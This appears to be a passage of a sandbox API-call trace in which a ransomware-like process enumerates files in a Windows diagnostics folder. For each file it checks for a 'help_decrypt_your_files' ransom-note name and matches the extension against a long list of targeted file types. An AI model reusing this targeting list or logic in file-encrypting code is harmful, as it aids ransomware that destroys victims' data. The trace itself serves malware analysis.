	[0168.524] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.524] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\*.*", lpSrch="packages") returned 0x0
	[0168.524] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.524] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\*.*", lpSrch="cookies") returned 0x0
	[0168.524] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.524] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\*.*", lpSrch="programdata") returned 0x0
	[0168.524] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xe1f25738, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xe1f25738, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0168.531] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0xdfc4722e, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xdfc4722e, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xdff8e649, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x1c9, dwReserved0=0x0, dwReserved1=0x0, cFileName="cfc.flights.json", cAlternateFileName="CFCFLI~1.JSO")) returned 1
	[0168.531] lstrcmpW (lpString1="cfc.flights.json", lpString2="..") returned 1
	[0168.531] lstrcmpW (lpString1="cfc.flights.json", lpString2=".") returned 1
	[0168.531] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\"
	[0168.531] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\", lpString2="cfc.flights.json" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\cfc.flights.json") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\cfc.flights.json"
	[0168.531] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\cfc.flights.json") returned 74
	[0168.532] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0168.532] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\cfc.flights.json", cchLength=0x4a | out: lpsz="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\cfc.flights.json") returned 0x4a
	[0168.532] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.532] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\cfc.flights.json", lpSrch="help_decrypt_your_files") returned 0x0
	[0168.532] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\cfc.flights.json" | out: lpString1="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\cfc.flights.json") returned="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\cfc.flights.json"
	[0168.532] lstrlenW (lpString="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\cfc.flights.json") returned 74
	[0168.532] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0168.533] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.533] StrStrW (lpFirst=".json", lpSrch=".") returned=".json"
	[0168.533] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.533] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".json") returned 0x0
	[0168.533] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0x35b42b5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xe0db65ac, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xe1f25738, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x4a30b, dwReserved0=0x0, dwReserved1=0x0, cFileName="telemetry.ASM-WindowsDefault.json", cAlternateFileName="TELEME~1.JSO")) returned 1
	[0168.533] lstrcmpW (lpString1="telemetry.ASM-WindowsDefault.json", lpString2="..") returned 1
	[0168.534] lstrcmpW (lpString1="telemetry.ASM-WindowsDefault.json", lpString2=".") returned 1
	[0168.534] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\"
	[0168.534] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\", lpString2="telemetry.ASM-WindowsDefault.json" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\telemetry.ASM-WindowsDefault.json") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\telemetry.ASM-WindowsDefault.json"
	[0168.534] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\telemetry.ASM-WindowsDefault.json") returned 91
	[0168.534] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0168.534] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\telemetry.ASM-WindowsDefault.json", cchLength=0x5b | out: lpsz="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\telemetry.asm-windowsdefault.json") returned 0x5b
	[0168.534] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.534] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\telemetry.asm-windowsdefault.json", lpSrch="help_decrypt_your_files") returned 0x0
	[0168.535] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\telemetry.asm-windowsdefault.json" | out: lpString1="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\telemetry.asm-windowsdefault.json") returned="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\telemetry.asm-windowsdefault.json"
	[0168.535] lstrlenW (lpString="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\telemetry.asm-windowsdefault.json") returned 91
	[0168.535] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0168.535] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.535] StrStrW (lpFirst=".json", lpSrch=".") returned=".json"
	[0168.535] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.535] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".json") returned 0x0
	[0168.536] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35b42b5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x972ca54f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x972ca54f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x334, dwReserved0=0x0, dwReserved1=0x0, cFileName="telemetry.ASM-WindowsDefault.json.bk", cAlternateFileName="TELEME~1.BK")) returned 1
	[0168.536] lstrcmpW (lpString1="telemetry.ASM-WindowsDefault.json.bk", lpString2="..") returned 1
	[0168.536] lstrcmpW (lpString1="telemetry.ASM-WindowsDefault.json.bk", lpString2=".") returned 1
	[0168.536] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\"
	[0168.536] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\", lpString2="telemetry.ASM-WindowsDefault.json.bk" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\telemetry.ASM-WindowsDefault.json.bk") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\telemetry.ASM-WindowsDefault.json.bk"
	[0168.536] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\telemetry.ASM-WindowsDefault.json.bk") returned 94
	[0168.536] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0168.536] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\telemetry.ASM-WindowsDefault.json.bk", cchLength=0x5e | out: lpsz="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\telemetry.asm-windowsdefault.json.bk") returned 0x5e
	[0168.537] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.537] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\telemetry.asm-windowsdefault.json.bk", lpSrch="help_decrypt_your_files") returned 0x0
	[0168.537] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\telemetry.asm-windowsdefault.json.bk" | out: lpString1="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\telemetry.asm-windowsdefault.json.bk") returned="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\telemetry.asm-windowsdefault.json.bk"
	[0168.537] lstrlenW (lpString="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\telemetry.asm-windowsdefault.json.bk") returned 94
	[0168.537] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0168.537] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.537] StrStrW (lpFirst=".bk", lpSrch=".") returned=".bk"
	[0168.537] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.538] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan